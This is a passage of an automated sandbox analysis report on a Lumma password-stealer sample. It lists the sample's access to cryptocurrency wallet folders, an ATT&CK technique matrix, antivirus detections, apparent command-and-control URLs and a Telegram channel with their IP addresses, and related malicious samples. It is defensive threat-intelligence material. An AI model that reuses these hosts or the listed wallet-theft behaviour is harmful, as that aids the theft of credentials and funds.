        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
        Source: Yara matchFile source: 00000000.00000003.1209759288.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe PID: 7872, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe.d90000.0.unpack, type: UNPACKEDPE
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        31
        Virtualization/Sandbox Evasion
        2
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        21
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information
        LSASS Memory321
        Security Software Discovery
        Remote Desktop Protocol41
        Data from Local System
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
        Obfuscated Files or Information
        Security Account Manager31
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
        Software Packing
        NTDS1
        Process Discovery
        Distributed Component Object ModelInput Capture14
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets1
        Application Window Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
        File and Directory Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync41
        System Information Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe78%ReversingLabsWin32.Trojan.LummaStealer
        SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe64%VirustotalBrowse
        SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe100%AviraHEUR/AGEN.1314134
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://caliberc.life/h0%Avira URL Cloudsafe
        https://caliberc.life/o0%Avira URL Cloudsafe
        https://caliberc.life/0%Avira URL Cloudsafe
        https://caliberc.life/30%Avira URL Cloudsafe
        https://caliberc.life:443/sjASHya0%Avira URL Cloudsafe
        https://caliberc.life/sjASHya0%Avira URL Cloudsafe
        https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=d8f552d865141d84e1_1102658720410%Avira URL Cloudsafe
        https://caliberc.life/sjASHya##0%Avira URL Cloudsafe
        https://caliberc.life/sjASHyah0%Avira URL Cloudsafe
        https://caliberc.life/k0%Avira URL Cloudsafe
        https://caliberc.life/sjASHyac0%Avira URL Cloudsafe
        https://caliberc.life/sjASHya#0%Avira URL Cloudsafe
        https://caliberc.life/sjASHyaX_0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        t.me
        149.154.167.99
        truefalse
          high
          caliberc.life
          104.21.48.1
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://t.me/owowoowokk3j4false
              high
              https://caliberc.life/sjASHyafalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://t.me/SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154518947.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://caliberc.life/hSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258086860.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209803966.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209759288.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219958282.0000000000BEB000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://caliberc.life/sjASHyahSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1247939503.0000000000C03000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://duckduckgo.com/ac/?q=SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://web.telegram.orgSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154518947.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://caliberc.life/oSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258086860.0000000000BEC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.enigmaprotector.com/openUSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258326313.0000000000DF3000.00000040.00000001.01000000.00000003.sdmpfalse
                        high
                        https://caliberc.life/kSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219958282.0000000000BEB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=d8f552d865141d84e1_110265872041SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154518947.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crl.rootca1.amazontrust.com/rootca1.crl0SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://ac.ecosia.org?q=SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://caliberc.life/sjASHya##SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257336425.0000000000BFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258131560.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1247939503.0000000000C03000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://ocsp.rootca1.amazontrust.com0:SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://caliberc.life/3SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258086860.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://caliberc.life:443/sjASHyaSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195707710.0000000004341000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_alldp.icoSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.ecosia.org/newtab/v20SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://web.telegram.orgX-Frame-OptionsALLOW-FROMSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154518947.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.c.lencr.org/0SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://x1.i.lencr.org/0SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://caliberc.life/OSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258086860.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://duckduckgo.com/chrome_newtabv20SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://caliberc.life/SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209803966.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209759288.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219958282.0000000000BEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1194785261.0000000003F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.microsoft.cSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209947318.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209843275.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.enigmaprotector.com/SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258326313.0000000000DF3000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.allSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195707710.0000000004341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://gemini.google.com/app?q=SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171908276.0000000003F43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://caliberc.life/sjASHyaX_SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219958282.0000000000BEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1195975150.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://caliberc.life/sjASHya#SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1184259968.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1184358636.0000000000C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://caliberc.life/sjASHyacSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257336425.0000000000BFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258131560.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228448566.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1247939503.0000000000BFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.21.48.1
                                                                          caliberc.lifeUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          149.154.167.99
                                                                          t.meUnited Kingdom
                                                                          62041TELEGRAMRUfalse
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1640295
                                                                          Start date and time:2025-03-17 04:16:10 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 5m 39s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:10
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@2/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 69%
                                                                          • Number of executed functions: 34
                                                                          • Number of non-executed functions: 137
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.12.23.50
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          23:17:05API Interceptor8x Sleep call for process: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          104.21.48.1345623.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • www.shlomi.app/9rzh/
                                                                          ySUB97Jq80.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.shlomi.app/9rzh/
                                                                          hQaXUS5gt0.exeGet hashmaliciousFormBookBrowse
                                                                          • www.newanthoperso.shop/3nis/
                                                                          6nA8ZygZLP.exeGet hashmaliciousFormBookBrowse
                                                                          • www.rbopisalive.cyou/2dxw/
                                                                          UhuGtHUgHf.exeGet hashmaliciousFormBookBrowse
                                                                          • www.enoughmoney.online/z9gb/
                                                                          Bill_of_Lading_20250307_pdf.bat.exeGet hashmaliciousLokibotBrowse
                                                                          • touxzw.ir/sccc/five/fre.php
                                                                          Stormwater Works Drawings Spec.jsGet hashmaliciousFormBookBrowse
                                                                          • www.lucynoel6465.shop/jgkl/
                                                                          Shipment Delivery No DE0093002-PDF.exeGet hashmaliciousLokibotBrowse
                                                                          • touxzw.ir/tking3/five/fre.php
                                                                          Remittance_CT022024.exeGet hashmaliciousLokibotBrowse
                                                                          • touxzw.ir/fix/five/fre.php
                                                                          http://microsoft-sharepoint4543464633.pages.dev/index-2jc93/Get hashmaliciousHTMLPhisherBrowse
                                                                          • microsoft-sharepoint4543464633.pages.dev/index-2jc93/
                                                                          149.154.167.99http://45.142.208.144.sslip.io/blog/Get hashmaliciousUnknownBrowse
                                                                          • telegram.org/img/emoji/40/F09F9889.png
                                                                          http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                          • telegram.org/img/favicon.ico
                                                                          http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                          • telegram.org/
                                                                          http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                          • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                          http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                          • telegram.org/
                                                                          http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                          • telegram.org/
                                                                          http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                          • telegram.org/?setln=pl
                                                                          http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                          • telegram.org/
                                                                          http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                          • telegram.dog/
                                                                          LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                          • t.me/cinoshibot
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          t.me12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.99
                                                                          FNLJD8Q3.exeGet hashmaliciousVidarBrowse
                                                                          • 149.154.167.99
                                                                          Nexol.exe.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 149.154.167.99
                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                          • 149.154.167.99
                                                                          GalaxySoft.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 149.154.167.99
                                                                          loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 149.154.167.99
                                                                          Install.exeGet hashmaliciousLummaC Stealer, RHADAMANTHYSBrowse
                                                                          • 149.154.167.99
                                                                          ShadowOF-Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 149.154.167.99
                                                                          mhtyieskfda.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 149.154.167.99
                                                                          bpyisefjjthawdtr.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 149.154.167.99
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          TELEGRAMRU12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.99
                                                                          FNLJD8Q3.exeGet hashmaliciousVidarBrowse
                                                                          • 149.154.167.99
                                                                          SpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 149.154.167.220
                                                                          Crack2025.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 149.154.167.220
                                                                          M6gQuZPvgY.exeGet hashmaliciousAmadey, LummaC Stealer, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                          • 149.154.167.220
                                                                          Ogdu1MivyN.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                          • 149.154.167.220
                                                                          SecuriteInfo.com.Python.Agent-ACY.11661.1637.exeGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          shit.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          Nexol.exe.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 149.154.167.99
                                                                          system.dll.exeGet hashmaliciousPython Stealer, BraodoBrowse
                                                                          • 149.154.167.220
                                                                          CLOUDFLARENETUSsample.zip.zipGet hashmaliciousGlobeimposterBrowse
                                                                          • 172.67.74.152
                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                          • 172.67.160.128
                                                                          stk.dllGet hashmaliciousUnknownBrowse
                                                                          • 172.67.69.236
                                                                          re.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 1.1.1.1
                                                                          re.bot.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                          • 1.1.1.1
                                                                          re.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 1.1.1.1
                                                                          CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                          • 104.21.48.1
                                                                          re.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                          • 1.1.1.1
                                                                          CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                          • 104.21.48.1
                                                                          RFQ_250037_S12_C01_R0_RU pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                          • 104.21.48.1
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          a0e9f5d64349fb13191bc781f81f42e1stk.dllGet hashmaliciousUnknownBrowse
                                                                          • 104.21.48.1
                                                                          • 149.154.167.99
                                                                          12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.21.48.1
                                                                          • 149.154.167.99
                                                                          SystemProcess18.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                                                          • 104.21.48.1
                                                                          • 149.154.167.99
                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.21.48.1
                                                                          • 149.154.167.99
                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.21.48.1
                                                                          • 149.154.167.99
                                                                          #Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7#Ud835#Udde8#Ud835#Udde3.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.21.48.1
                                                                          • 149.154.167.99
                                                                          2PFebPN0qK.exeGet hashmaliciousLatrodectus, LummaC StealerBrowse
                                                                          • 104.21.48.1
                                                                          • 149.154.167.99
                                                                          #Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7#Ud835#Udde8#Ud835#Udde3.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.21.48.1
                                                                          • 149.154.167.99
                                                                          LaunchV.2.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.48.1
                                                                          • 149.154.167.99
                                                                          16Vzai4jwT.exeGet hashmaliciousCobaltStrikeBrowse
                                                                          • 104.21.48.1
                                                                          • 149.154.167.99
                                                                          No context
                                                                          No created / dropped files found
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.988384234072992
                                                                          TrID:
